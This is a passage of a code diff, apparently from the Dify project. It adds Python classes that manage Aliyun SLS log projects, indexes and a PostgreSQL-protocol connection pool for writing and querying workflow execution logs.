logging.getLogger(__name__) + + +class AliyunLogStore: + """ + Singleton class for Aliyun SLS LogStore operations. + + Ensures only one instance exists to prevent multiple PG connection pools. + """ + + _instance: "AliyunLogStore | None" = None + _initialized: bool = False + + # Track delayed PG connection for newly created projects + _pg_connection_timer: threading.Timer | None = None + _pg_connection_delay: int = 90 # delay seconds + + # Default tokenizer for text/json fields and full-text index + # Common delimiters: comma, space, quotes, punctuation, operators, brackets, special chars + DEFAULT_TOKEN_LIST = [ + ",", + " ", + '"', + '"', + ";", + "=", + "(", + ")", + "[", + "]", + "{", + "}", + "?", + "@", + "&", + "<", + ">", + "/", + ":", + "\n", + "\t", + ] + + def __new__(cls) -> "AliyunLogStore": + """Implement singleton pattern.""" + if cls._instance is None: + cls._instance = super().__new__(cls) + return cls._instance + + project_des = "dify" + + workflow_execution_logstore = "workflow_execution" + + workflow_node_execution_logstore = "workflow_node_execution" + + @staticmethod + def _sqlalchemy_type_to_logstore_type(column: Any) -> str: + """ + Map SQLAlchemy column type to Aliyun LogStore index type. + + Args: + column: SQLAlchemy column object + + Returns: + LogStore index type: 'text', 'long', 'double', or 'json' + """ + column_type = column.type + + # Integer types -> long + if isinstance(column_type, (sa.Integer, sa.BigInteger, sa.SmallInteger)): + return "long" + + # Float types -> double + if isinstance(column_type, (sa.Float, sa.Numeric)): + return "double" + + # String and Text types -> text + if isinstance(column_type, (sa.String, sa.Text)): + return "text" + + # DateTime -> text (stored as ISO format string in logstore) + if isinstance(column_type, sa.DateTime): + return "text" + + # Boolean -> long (stored as 0/1) + if isinstance(column_type, sa.Boolean): + return "long" + + # JSON -> json + if isinstance(column_type, sa.JSON): + return "json" + + # Default to text for unknown types + return "text" + + @staticmethod + def _generate_index_keys_from_model(model_class: type[DeclarativeBase]) -> dict[str, IndexKeyConfig]: + """ + Automatically generate LogStore field index configuration from SQLAlchemy model. + + This method introspects the SQLAlchemy model's column definitions and creates + corresponding LogStore index configurations. When the PG schema is updated via + Flask-Migrate, this method will automatically pick up the new fields on next startup. + + Args: + model_class: SQLAlchemy model class (e.g., WorkflowRun, WorkflowNodeExecutionModel) + + Returns: + Dictionary mapping field names to IndexKeyConfig objects + """ + index_keys = {} + + # Iterate over all mapped columns in the model + if hasattr(model_class, "__mapper__"): + for column_name, column_property in model_class.__mapper__.columns.items(): + # Skip relationship properties and other non-column attributes + if not hasattr(column_property, "type"): + continue + + # Map SQLAlchemy type to LogStore type + logstore_type = AliyunLogStore._sqlalchemy_type_to_logstore_type(column_property) + + # Create index configuration + # - text fields: case_insensitive for better search, with tokenizer and Chinese support + # - all fields: doc_value=True for analytics + if logstore_type == "text": + index_keys[column_name] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=AliyunLogStore.DEFAULT_TOKEN_LIST, + chinese=True, + ) + else: + index_keys[column_name] = IndexKeyConfig(index_type=logstore_type, doc_value=True) + + # Add log_version field (not in PG model, but used in logstore for versioning) + index_keys["log_version"] = IndexKeyConfig(index_type="long", doc_value=True) + + return index_keys + + def __init__(self) -> None: + # Skip initialization if already initialized (singleton pattern) + if self.__class__._initialized: + return + + load_dotenv() + + self.access_key_id: str = os.environ.get("ALIYUN_SLS_ACCESS_KEY_ID", "") + self.access_key_secret: str = os.environ.get("ALIYUN_SLS_ACCESS_KEY_SECRET", "") + self.endpoint: str = os.environ.get("ALIYUN_SLS_ENDPOINT", "") + self.region: str = os.environ.get("ALIYUN_SLS_REGION", "") + self.project_name: str = os.environ.get("ALIYUN_SLS_PROJECT_NAME", "") + self.logstore_ttl: int = int(os.environ.get("ALIYUN_SLS_LOGSTORE_TTL", 365)) + self.log_enabled: bool = os.environ.get("SQLALCHEMY_ECHO", "false").lower() == "true" + self.pg_mode_enabled: bool = os.environ.get("LOGSTORE_PG_MODE_ENABLED", "true").lower() == "true" + + # Initialize SDK client + self.client = LogClient( + self.endpoint, self.access_key_id, self.access_key_secret, auth_version=AUTH_VERSION_4, region=self.region + ) + + # Append Dify identification to the existing user agent + original_user_agent = self.client._user_agent # pyright: ignore[reportPrivateUsage] + dify_version = dify_config.project.version + enhanced_user_agent = f"Dify,Dify-{dify_version},{original_user_agent}" + self.client.set_user_agent(enhanced_user_agent) + + # PG client will be initialized in init_project_logstore + self._pg_client: AliyunLogStorePG | None = None + self._use_pg_protocol: bool = False + + self.__class__._initialized = True + + @property + def supports_pg_protocol(self) -> bool: + """Check if PG protocol is supported and enabled.""" + return self._use_pg_protocol + + def _attempt_pg_connection_init(self) -> bool: + """ + Attempt to initialize PG connection. + + This method tries to establish PG connection and performs necessary checks. + It's used both for immediate connection (existing projects) and delayed connection (new projects). + + Returns: + True if PG connection was successfully established, False otherwise. + """ + if not self.pg_mode_enabled or not self._pg_client: + return False + + try: + self._use_pg_protocol = self._pg_client.init_connection() + if self._use_pg_protocol: + logger.info("Successfully connected to project %s using PG protocol", self.project_name) + # Check if scan_index is enabled for all logstores + self._check_and_disable_pg_if_scan_index_disabled() + return True + else: + logger.info("PG connection failed for project %s. Will use SDK mode.", self.project_name) + return False + except Exception as e: + logger.warning( + "Failed to establish PG connection for project %s: %s. Will use SDK mode.", + self.project_name, + str(e), + ) + self._use_pg_protocol = False + return False + + def _delayed_pg_connection_init(self) -> None: + """ + Delayed initialization of PG connection for newly created projects. + + This method is called by a background timer 3 minutes after project creation. + """ + # Double check conditions in case state changed + if self._use_pg_protocol: + return + + logger.info( + "Attempting delayed PG connection for newly created project %s ...", + self.project_name, + ) + self._attempt_pg_connection_init() + self.__class__._pg_connection_timer = None + + def init_project_logstore(self): + """ + Initialize project, logstore, index, and PG connection. + + This method should be called once during application startup to ensure + all required resources exist and connections are established. + """ + # Step 1: Ensure project and logstore exist + project_is_new = False + if not self.is_project_exist(): + self.create_project() + project_is_new = True + + self.create_logstore_if_not_exist() + + # Step 2: Initialize PG client and connection (if enabled) + if not self.pg_mode_enabled: + logger.info("PG mode is disabled. Will use SDK mode.") + return + + # Create PG client if not already created + if self._pg_client is None: + logger.info("Initializing PG client for project %s...", self.project_name) + self._pg_client = AliyunLogStorePG( + self.access_key_id, self.access_key_secret, self.endpoint, self.project_name + ) + + # Step 3: Establish PG connection based on project status + if project_is_new: + # For newly created projects, schedule delayed PG connection + self._use_pg_protocol = False + logger.info( + "Project %s is newly created. Will use SDK mode and schedule PG connection attempt in %d seconds.", + self.project_name, + self.__class__._pg_connection_delay, + ) + if self.__class__._pg_connection_timer is not None: + self.__class__._pg_connection_timer.cancel() + self.__class__._pg_connection_timer = threading.Timer( + self.__class__._pg_connection_delay, + self._delayed_pg_connection_init, + ) + self.__class__._pg_connection_timer.daemon = True # Don't block app shutdown + self.__class__._pg_connection_timer.start() + else: + # For existing projects, attempt PG connection immediately + logger.info("Project %s already exists. Attempting PG connection...", self.project_name) + self._attempt_pg_connection_init() + + def _check_and_disable_pg_if_scan_index_disabled(self) -> None: + """ + Check if scan_index is enabled for all logstores. + If any logstore has scan_index=false, disable PG protocol. + + This is necessary because PG protocol requires scan_index to be enabled. + """ + logstore_name_list = [ + AliyunLogStore.workflow_execution_logstore, + AliyunLogStore.workflow_node_execution_logstore, + ] + + for logstore_name in logstore_name_list: + existing_config = self.get_existing_index_config(logstore_name) + if existing_config and not existing_config.scan_index: + logger.info( + "Logstore %s has scan_index=false, USE SDK mode for read/write operations. " + "PG protocol requires scan_index to be enabled.", + logstore_name, + ) + self._use_pg_protocol = False + # Close PG connection if it was initialized + if self._pg_client: + self._pg_client.close() + self._pg_client = None + return + + def is_project_exist(self) -> bool: + try: + self.client.get_project(self.project_name) + return True + except Exception as e: + if e.args[0] == "ProjectNotExist": + return False + else: + raise e + + def create_project(self): + try: + self.client.create_project(self.project_name, AliyunLogStore.project_des) + logger.info("Project %s created successfully", self.project_name) + except LogException as e: + logger.exception( + "Failed to create project %s: errorCode=%s, errorMessage=%s, requestId=%s", + self.project_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def is_logstore_exist(self, logstore_name: str) -> bool: + try: + _ = self.client.get_logstore(self.project_name, logstore_name) + return True + except Exception as e: + if e.args[0] == "LogStoreNotExist": + return False + else: + raise e + + def create_logstore_if_not_exist(self) -> None: + logstore_name_list = [ + AliyunLogStore.workflow_execution_logstore, + AliyunLogStore.workflow_node_execution_logstore, + ] + + for logstore_name in logstore_name_list: + if not self.is_logstore_exist(logstore_name): + try: + self.client.create_logstore( + project_name=self.project_name, logstore_name=logstore_name, ttl=self.logstore_ttl + ) + logger.info("logstore %s created successfully", logstore_name) + except LogException as e: + logger.exception( + "Failed to create logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + # Ensure index contains all Dify-required fields + # This intelligently merges with existing config, preserving custom indexes + self.ensure_index_config(logstore_name) + + def is_index_exist(self, logstore_name: str) -> bool: + try: + _ = self.client.get_index_config(self.project_name, logstore_name) + return True + except Exception as e: + if e.args[0] == "IndexConfigNotExist": + return False + else: + raise e + + def get_existing_index_config(self, logstore_name: str) -> IndexConfig | None: + """ + Get existing index configuration from logstore. + + Args: + logstore_name: Name of the logstore + + Returns: + IndexConfig object if index exists, None otherwise + """ + try: + response = self.client.get_index_config(self.project_name, logstore_name) + return response.get_index_config() + except Exception as e: + if e.args[0] == "IndexConfigNotExist": + return None + else: + logger.exception("Failed to get index config for logstore %s", logstore_name) + raise e + + def _get_workflow_execution_index_keys(self) -> dict[str, IndexKeyConfig]: + """ + Get field index configuration for workflow_execution logstore. + + This method automatically generates index configuration from the WorkflowRun SQLAlchemy model. + When the PG schema is updated via Flask-Migrate, the index configuration will be automatically + updated on next application startup. + """ + from models.workflow import WorkflowRun + + index_keys = self._generate_index_keys_from_model(WorkflowRun) + + # Add custom fields that are in logstore but not in PG model + # These fields are added by the repository layer + index_keys["error_message"] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=self.DEFAULT_TOKEN_LIST, + chinese=True, + ) # Maps to 'error' in PG + index_keys["started_at"] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=self.DEFAULT_TOKEN_LIST, + chinese=True, + ) # Maps to 'created_at' in PG + + logger.info("Generated %d index keys for workflow_execution from WorkflowRun model", len(index_keys)) + return index_keys + + def _get_workflow_node_execution_index_keys(self) -> dict[str, IndexKeyConfig]: + """ + Get field index configuration for workflow_node_execution logstore. + + This method automatically generates index configuration from the WorkflowNodeExecutionModel. + When the PG schema is updated via Flask-Migrate, the index configuration will be automatically + updated on next application startup. + """ + from models.workflow import WorkflowNodeExecutionModel + + index_keys = self._generate_index_keys_from_model(WorkflowNodeExecutionModel) + + logger.debug( + "Generated %d index keys for workflow_node_execution from WorkflowNodeExecutionModel", len(index_keys) + ) + return index_keys + + def _get_index_config(self, logstore_name: str) -> IndexConfig: + """ + Get index configuration for the specified logstore. + + Args: + logstore_name: Name of the logstore + + Returns: + IndexConfig object with line and field indexes + """ + # Create full-text index (line config) with tokenizer + line_config = IndexLineConfig(token_list=self.DEFAULT_TOKEN_LIST, case_sensitive=False, chinese=True) + + # Get field index configuration based on logstore name + field_keys = {} + if logstore_name == AliyunLogStore.workflow_execution_logstore: + field_keys = self._get_workflow_execution_index_keys() + elif logstore_name == AliyunLogStore.workflow_node_execution_logstore: + field_keys = self._get_workflow_node_execution_index_keys() + + # key_config_list should be a dict, not a list + # Create index config with both line and field indexes + return IndexConfig(line_config=line_config, key_config_list=field_keys, scan_index=True) + + def create_index(self, logstore_name: str) -> None: + """ + Create index for the specified logstore with both full-text and field indexes. + Field indexes are automatically generated from the corresponding SQLAlchemy model. + """ + index_config = self._get_index_config(logstore_name) + + try: + self.client.create_index(self.project_name, logstore_name, index_config) + logger.info( + "index for %s created successfully with %d field indexes", + logstore_name, + len(index_config.key_config_list or {}), + ) + except LogException as e: + logger.exception( + "Failed to create index for logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def _merge_index_configs( + self, existing_config: IndexConfig, required_keys: dict[str, IndexKeyConfig], logstore_name: str + ) -> tuple[IndexConfig, bool]: + """ + Intelligently merge existing index config with Dify's required field indexes. + + This method: + 1. Preserves all existing field indexes in logstore (including custom fields) + 2. Adds missing Dify-required fields + 3. Updates fields where type doesn't match (with json/text compatibility) + 4. Corrects case mismatches (e.g., if Dify needs 'status' but logstore has 'Status') + + Type compatibility rules: + - json and text types are considered compatible (users can manually choose either) + - All other type mismatches will be corrected to match Dify requirements + + Note: Logstore is case-sensitive and doesn't allow duplicate fields with different cases. + Case mismatch means: existing field name differs from required name only in case. + + Args: + existing_config: Current index configuration from logstore + required_keys: Dify's required field index configurations + logstore_name: Name of the logstore (for logging) + + Returns: + Tuple of (merged_config, needs_update) + """ + # key_config_list is already a dict in the SDK + # Make a copy to avoid modifying the original + existing_keys = dict(existing_config.key_config_list) if existing_config.key_config_list else {} + + # Track changes + needs_update = False + case_corrections = [] # Fields that need case correction (e.g., 'Status' -> 'status') + missing_fields = [] + type_mismatches = [] + + # First pass: Check for and resolve case mismatches with required fields + # Note: Logstore itself doesn't allow duplicate fields with different cases, + # so we only need to check if the existing case matches the required case + for required_name in required_keys: + lower_name = required_name.lower() + # Find key that matches case-insensitively but not exactly + wrong_case_key = None + for existing_key in existing_keys: + if existing_key.lower() == lower_name and existing_key != required_name: + wrong_case_key = existing_key + break + + if wrong_case_key: + # Field exists but with wrong case (e.g., 'Status' when we need 'status') + # Remove the wrong-case key, will be added back with correct case later + case_corrections.append((wrong_case_key, required_name)) + del existing_keys[wrong_case_key] + needs_update = True + + # Second pass: Check each required field + for required_name, required_config in required_keys.items(): + # Check for exact match (case-sensitive) + if required_name in existing_keys: + existing_type = existing_keys[required_name].index_type + required_type = required_config.index_type + + # Check if type matches + # Special case: json and text are interchangeable for JSON content fields + # Allow users to manually configure text instead of json (or vice versa) without forcing updates + is_compatible = existing_type == required_type or ({existing_type, required_type} == {"json", "text"}) + + if not is_compatible: + type_mismatches.append((required_name, existing_type, required_type)) + # Update with correct type + existing_keys[required_name] = required_config + needs_update = True + # else: field exists with compatible type, no action needed + else: + # Field doesn't exist (may have been removed in first pass due to case conflict) + missing_fields.append(required_name) + existing_keys[required_name] = required_config + needs_update = True + + # Log changes + if missing_fields: + logger.info( + "Logstore %s: Adding %d missing Dify-required fields: %s", + logstore_name, + len(missing_fields), + ", ".join(missing_fields[:10]) + ("..." if len(missing_fields) > 10 else ""), + ) + + if type_mismatches: + logger.info( + "Logstore %s: Fixing %d type mismatches: %s", + logstore_name, + len(type_mismatches), + ", ".join([f"{name}({old}->{new})" for name, old, new in type_mismatches[:5]]) + + ("..." if len(type_mismatches) > 5 else ""), + ) + + if case_corrections: + logger.info( + "Logstore %s: Correcting %d field name cases: %s", + logstore_name, + len(case_corrections), + ", ".join([f"'{old}' -> '{new}'" for old, new in case_corrections[:5]]) + + ("..." if len(case_corrections) > 5 else ""), + ) + + # Create merged config + # key_config_list should be a dict, not a list + # Preserve the original scan_index value - don't force it to True + merged_config = IndexConfig( + line_config=existing_config.line_config + or IndexLineConfig(token_list=self.DEFAULT_TOKEN_LIST, case_sensitive=False, chinese=True), + key_config_list=existing_keys, + scan_index=existing_config.scan_index, + ) + + return merged_config, needs_update + + def ensure_index_config(self, logstore_name: str) -> None: + """ + Ensure index configuration includes all Dify-required fields. + + This method intelligently manages index configuration: + 1. If index doesn't exist, create it with Dify's required fields + 2. If index exists: + - Check if all Dify-required fields are present + - Check if field types match requirements + - Only update if fields are missing or types are incorrect + - Preserve any additional custom index configurations + + This approach allows users to add their own custom indexes without being overwritten. + """ + # Get Dify's required field indexes + required_keys = {} + if logstore_name == AliyunLogStore.workflow_execution_logstore: + required_keys = self._get_workflow_execution_index_keys() + elif logstore_name == AliyunLogStore.workflow_node_execution_logstore: + required_keys = self._get_workflow_node_execution_index_keys() + + # Check if index exists + existing_config = self.get_existing_index_config(logstore_name) + + if existing_config is None: + # Index doesn't exist, create it + logger.info( + "Logstore %s: Index doesn't exist, creating with %d required fields", + logstore_name, + len(required_keys), + ) + self.create_index(logstore_name) + else: + merged_config, needs_update = self._merge_index_configs(existing_config, required_keys, logstore_name) + + if needs_update: + logger.info("Logstore %s: Updating index to include Dify-required fields", logstore_name) + try: + self.client.update_index(self.project_name, logstore_name, merged_config) + logger.info( + "Logstore %s: Index updated successfully, now has %d total field indexes", + logstore_name, + len(merged_config.key_config_list or {}), + ) + except LogException as e: + logger.exception( + "Failed to update index for logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + else: + logger.info( + "Logstore %s: Index already contains all %d Dify-required fields with correct types, " + "no update needed", + logstore_name, + len(required_keys), + ) + + def put_log(self, logstore: str, contents: Sequence[tuple[str, str]]) -> None: + # Route to PG or SDK based on protocol availability + if self._use_pg_protocol and self._pg_client: + self._pg_client.put_log(logstore, contents, self.log_enabled) + else: + log_item = LogItem(contents=contents) + request = PutLogsRequest(project=self.project_name, logstore=logstore, logitems=[log_item]) + + if self.log_enabled: + logger.info( + "[LogStore-SDK] PUT_LOG | logstore=%s | project=%s | items_count=%d", + logstore, + self.project_name, + len(contents), + ) + + try: + self.client.put_logs(request) + except LogException as e: + logger.exception( + "Failed to put logs to logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def get_logs( + self, + logstore: str, + from_time: int, + to_time: int, + topic: str = "", + query: str = "", + line: int = 100, + offset: int = 0, + reverse: bool = True, + ) -> list[dict]: + request = GetLogsRequest( + project=self.project_name, + logstore=logstore, + fromTime=from_time, + toTime=to_time, + topic=topic, + query=query, + line=line, + offset=offset, + reverse=reverse, + ) + + # Log query info if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore] GET_LOGS | logstore=%s | project=%s | query=%s | " + "from_time=%d | to_time=%d | line=%d | offset=%d | reverse=%s", + logstore, + self.project_name, + query, + from_time, + to_time, + line, + offset, + reverse, + ) + + try: + response = self.client.get_logs(request) + result = [] + logs = response.get_logs() if response else [] + for log in logs: + result.append(log.get_contents()) + + # Log result count if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore] GET_LOGS RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + except LogException as e: + logger.exception( + "Failed to get logs from logstore %s with query '%s': errorCode=%s, errorMessage=%s, requestId=%s", + logstore, + query, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def execute_sql( + self, + sql: str, + logstore: str | None = None, + query: str = "*", + from_time: int | None = None, + to_time: int | None = None, + power_sql: bool = False, + ) -> list[dict]: + """ + Execute SQL query for aggregation and analysis. + + Args: + sql: SQL query string (SELECT statement) + logstore: Name of the logstore (required) + query: Search/filter query for SDK mode (default: "*" for all logs). + Only used in SDK mode. PG mode ignores this parameter. + from_time: Start time (Unix timestamp) - only used in SDK mode + to_time: End time (Unix timestamp) - only used in SDK mode + power_sql: Whether to use enhanced SQL mode (default: False) + + Returns: + List of result rows as dictionaries + + Note: + - PG mode: Only executes the SQL directly + - SDK mode: Combines query and sql as "query | sql" + """ + # Logstore is required + if not logstore: + raise ValueError("logstore parameter is required for execute_sql") + + # Route to PG or SDK based on protocol availability + if self._use_pg_protocol and self._pg_client: + # PG mode: execute SQL directly (ignore query parameter) + return self._pg_client.execute_sql(sql, logstore, self.log_enabled) + else: + # SDK mode: combine query and sql as "query | sql" + full_query = f"{query} | {sql}" + + # Provide default time range if not specified + if from_time is None: + from_time = 0 + + if to_time is None: + to_time = int(time.time()) # now + + request = GetLogsRequest( + project=self.project_name, + logstore=logstore, + fromTime=from_time, + toTime=to_time, + query=full_query, + ) + + # Log query info if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore-SDK] EXECUTE_SQL | logstore=%s | project=%s | from_time=%d | to_time=%d | full_query=%s", + logstore, + self.project_name, + from_time, + to_time, + query, + sql, + ) + + try: + response = self.client.get_logs(request) + + result = [] + logs = response.get_logs() if response else [] + for log in logs: + result.append(log.get_contents()) + + # Log result count if SQLALCHEMY_ECHO is enabled + if self.log_enabled: + logger.info( + "[LogStore-SDK] EXECUTE_SQL RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + except LogException as e: + logger.exception( + "Failed to execute SQL, logstore %s: errorCode=%s, errorMessage=%s, requestId=%s, full_query=%s", + logstore, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + full_query, + ) + raise + + +if __name__ == "__main__": + aliyun_logstore = AliyunLogStore() + # aliyun_logstore.init_project_logstore() + aliyun_logstore.put_log(AliyunLogStore.workflow_execution_logstore, [("key1", "value1")]) diff --git a/api/extensions/logstore/aliyun_logstore_pg.py b/api/extensions/logstore/aliyun_logstore_pg.py new file mode 100644 index 0000000000..35aa51ce53 --- /dev/null +++ b/api/extensions/logstore/aliyun_logstore_pg.py @@ -0,0 +1,407 @@ +import logging +import os +import socket +import time +from collections.abc import Sequence +from contextlib import contextmanager +from typing import Any + +import psycopg2 +import psycopg2.pool +from psycopg2 import InterfaceError, OperationalError + +from configs import dify_config + +logger = logging.getLogger(__name__) + + +class AliyunLogStorePG: + """ + PostgreSQL protocol support for Aliyun SLS LogStore. + + Handles PG connection pooling and operations for regions that support PG protocol. + """ + + def __init__(self, access_key_id: str, access_key_secret: str, endpoint: str, project_name: str): + """ + Initialize PG connection for SLS. + + Args: + access_key_id: Aliyun access key ID + access_key_secret: Aliyun access key secret + endpoint: SLS endpoint + project_name: SLS project name + """ + self._access_key_id = access_key_id + self._access_key_secret = access_key_secret + self._endpoint = endpoint + self.project_name = project_name + self._pg_pool: psycopg2.pool.SimpleConnectionPool | None = None + self._use_pg_protocol = False + + def _check_port_connectivity(self, host: str, port: int, timeout: float = 2.0) -> bool: + """ + Check if a TCP port is reachable using socket connection. + + This provides a fast check before attempting full database connection, + preventing long waits when connecting to unsupported regions. + + Args: + host: Hostname or IP address + port: Port number + timeout: Connection timeout in seconds (default: 2.0) + + Returns: + True if port is reachable, False otherwise + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(timeout) + result = sock.connect_ex((host, port)) + sock.close() + return result == 0 + except Exception as e: + logger.debug("Port connectivity check failed for %s:%d: %s", host, port, str(e)) + return False + + def init_connection(self) -> bool: + """ + Initialize PostgreSQL connection pool for SLS PG protocol support. + + Attempts to connect to SLS using PostgreSQL protocol. If successful, sets + _use_pg_protocol to True and creates a connection pool. If connection fails + (region doesn't support PG protocol or other errors), returns False. + + Returns: + True if PG protocol is supported and initialized, False otherwise + """ + try: + # Extract hostname from endpoint (remove protocol if present) + pg_host = self._endpoint.replace("http://", "").replace("https://", "") + + # Get pool configuration + pg_max_connections = int(os.environ.get("ALIYUN_SLS_PG_MAX_CONNECTIONS", 10)) + + logger.debug( + "Check PG protocol connection to SLS: host=%s, project=%s", + pg_host, + self.project_name, + ) + + # Fast port connectivity check before attempting full connection + # This prevents long waits when connecting to unsupported regions + if not self._check_port_connectivity(pg_host, 5432, timeout=1.0): + logger.info( + "USE SDK mode for read/write operations, host=%s", + pg_host, + ) + return False + + # Create connection pool + self._pg_pool = psycopg2.pool.SimpleConnectionPool( + minconn=1, + maxconn=pg_max_connections, + host=pg_host, + port=5432, + database=self.project_name, + user=self._access_key_id, + password=self._access_key_secret, + sslmode="require", + connect_timeout=5, + application_name=f"Dify-{dify_config.project.version}", + ) + + # Note: Skip test query because SLS PG protocol only supports SELECT/INSERT on actual tables + # Connection pool creation success already indicates connectivity + + self._use_pg_protocol = True + logger.info( + "PG protocol initialized successfully for SLS project=%s. Will use PG for read/write operations.", + self.project_name, + ) + return True + + except Exception as e: + # PG connection failed - fallback to SDK mode + self._use_pg_protocol = False + if self._pg_pool: + try: + self._pg_pool.closeall() + except Exception: + logger.debug("Failed to close PG connection pool during cleanup, ignoring") + self._pg_pool = None + + logger.info( + "PG protocol connection failed (region may not support PG protocol): %s. " + "Falling back to SDK mode for read/write operations.", + str(e), + ) + return False + + def _is_connection_valid(self, conn: Any) -> bool: + """ + Check if a connection is still valid. + + Args: + conn: psycopg2 connection object + + Returns: + True if connection is valid, False otherwise + """ + try: + # Check if connection is closed + if conn.closed: + return False + + # Quick ping test - execute a lightweight query + # For SLS PG protocol, we can't use SELECT 1 without FROM, + # so we just check the connection status + with conn.cursor() as cursor: + cursor.execute("SELECT 1") + cursor.fetchone() + return True + except Exception: + return False + + @contextmanager + def _get_connection(self): + """ + Context manager to get a PostgreSQL connection from the pool. + + Automatically validates and refreshes stale connections. + + Note: Aliyun SLS PG protocol does not support transactions, so we always + use autocommit mode. + + Yields: + psycopg2 connection object + + Raises: + RuntimeError: If PG pool is not initialized + """ + if not self._pg_pool: + raise RuntimeError("PG connection pool is not initialized") + + conn = self._pg_pool.getconn() + try: + # Validate connection and get a fresh one if needed + if not self._is_connection_valid(conn): + logger.debug("Connection is stale, marking as bad and getting a new one") + # Mark connection as bad and get a new one + self._pg_pool.putconn(conn, close=True) + conn = self._pg_pool.getconn() + + # Aliyun SLS PG protocol does not support transactions, always use autocommit + conn.autocommit = True + yield conn + finally: + # Return connection to pool (or close if it's bad) + if self._is_connection_valid(conn): + self._pg_pool.putconn(conn) + else: + self._pg_pool.putconn(conn, close=True) + + def close(self) -> None: + """Close the PostgreSQL connection pool.""" + if self._pg_pool: + try: + self._pg_pool.closeall() + logger.info("PG connection pool closed") + except Exception: + logger.exception("Failed to close PG connection pool") + + def _is_retriable_error(self, error: Exception) -> bool: + """ + Check if an error is retriable (connection-related issues). + + Args: + error: Exception to check + + Returns: + True if the error is retriable, False otherwise + """ + # Retry on connection-related errors + if isinstance(error, (OperationalError, InterfaceError)): + return True + + # Check error message for specific connection issues + error_msg = str(error).lower() + retriable_patterns = [ + "connection", + "timeout", + "closed", + "broken pipe", + "reset by peer", + "no route to host", + "network", + ] + return any(pattern in error_msg for pattern in retriable_patterns) + + def put_log(self, logstore: str, contents: Sequence[tuple[str, str]], log_enabled: bool = False) -> None: + """ + Write log to SLS using PostgreSQL protocol with automatic retry. + + Note: SLS PG protocol only supports INSERT (not UPDATE). This uses append-only + writes with log_version field for versioning, same as SDK implementation. + + Args: + logstore: Name of the logstore table + contents: List of (field_name, value) tuples + log_enabled: Whether to enable logging + + Raises: + psycopg2.Error: If database operation fails after all retries + """ + if not contents: + return + + # Extract field names and values from contents + fields = [field_name for field_name, _ in contents] + values = [value for _, value in contents] + + # Build INSERT statement with literal values + # Note: Aliyun SLS PG protocol doesn't support parameterized queries, + # so we need to use mogrify to safely create literal values + field_list = ", ".join([f'"{field}"' for field in fields]) + + if log_enabled: + logger.info( + "[LogStore-PG] PUT_LOG | logstore=%s | project=%s | items_count=%d", + logstore, + self.project_name, + len(contents), + ) + + # Retry configuration + max_retries = 3 + retry_delay = 0.1 # Start with 100ms + + for attempt in range(max_retries): + try: + with self._get_connection() as conn: + with conn.cursor() as cursor: + # Use mogrify to safely convert values to SQL literals + placeholders = ", ".join(["%s"] * len(fields)) + values_literal = cursor.mogrify(f"({placeholders})", values).decode("utf-8") + insert_sql = f'INSERT INTO "{logstore}" ({field_list}) VALUES {values_literal}' + cursor.execute(insert_sql) + # Success - exit retry loop + return + + except psycopg2.Error as e: + # Check if error is retriable + if not self._is_retriable_error(e): + # Not a retriable error (e.g., data validation error), fail immediately + logger.exception( + "Failed to put logs to logstore %s via PG protocol (non-retriable error)", + logstore, + ) + raise + + # Retriable error - log and retry if we have attempts left + if attempt < max_retries - 1: + logger.warning( + "Failed to put logs to logstore %s via PG protocol (attempt %d/%d): %s. Retrying...", + logstore, + attempt + 1, + max_retries, + str(e), + ) + time.sleep(retry_delay) + retry_delay *= 2 # Exponential backoff + else: + # Last attempt failed + logger.exception( + "Failed to put logs to logstore %s via PG protocol after %d attempts", + logstore, + max_retries, + ) + raise + + def execute_sql(self, sql: str, logstore: str, log_enabled: bool = False) -> list[dict[str, Any]]: + """ + Execute SQL query using PostgreSQL protocol with automatic retry. + + Args: + sql: SQL query string + logstore: Name of the logstore (for logging purposes) + log_enabled: Whether to enable logging + + Returns: + List of result rows as dictionaries + + Raises: + psycopg2.Error: If database operation fails after all retries + """ + if log_enabled: + logger.info( + "[LogStore-PG] EXECUTE_SQL | logstore=%s | project=%s | sql=%s", + logstore, + self.project_name, + sql, + ) + + # Retry configuration + max_retries = 3 + retry_delay = 0.1 # Start with 100ms + + for attempt in range(max_retries): + try: + with self._get_connection() as conn: + with conn.cursor() as cursor: + cursor.execute(sql) + + # Get column names from cursor description + columns = [desc[0] for desc in cursor.description] + + # Fetch all results and convert to list of dicts + result = [] + for row in cursor.fetchall(): + row_dict = {} + for col, val in zip(columns, row): + row_dict[col] = "" if val is None else str(val) + result.append(row_dict) + + if log_enabled: + logger.info( + "[LogStore-PG] EXECUTE_SQL RESULT | logstore=%s | returned_count=%d", + logstore, + len(result), + ) + + return result + + except psycopg2.Error as e: + # Check if error is retriable + if not self._is_retriable_error(e): + # Not a retriable error (e.g., SQL syntax error), fail immediately + logger.exception( + "Failed to execute SQL query on logstore %s via PG protocol (non-retriable error): sql=%s", + logstore, + sql, + ) + raise + + # Retriable error - log and retry if we have attempts left + if attempt < max_retries - 1: + logger.warning( + "Failed to execute SQL query on logstore %s via PG protocol (attempt %d/%d): %s. Retrying...", + logstore, + attempt + 1, + max_retries, + str(e), + ) + time.sleep(retry_delay) + retry_delay *= 2 # Exponential backoff + else: + # Last attempt failed + logger.exception( + "Failed to execute SQL query on logstore %s via PG 